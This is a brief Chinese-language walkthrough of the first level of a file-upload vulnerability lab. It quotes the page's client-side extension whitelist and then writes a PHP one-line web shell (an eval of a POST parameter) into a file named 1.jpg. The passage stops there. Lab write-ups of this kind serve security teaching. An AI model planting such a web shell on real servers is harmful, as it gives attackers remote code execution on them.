第一关 随便上传一个.txt文件,弹出提示上穿不成功,设置了白名单,后缀名必须时.jpg、.png、.gif: 看看源代码: var allow_ext = ".jpg|.png|.gif"; 创建一个写有一句话木马的1.jpg: <?php @eval($_POST['123']);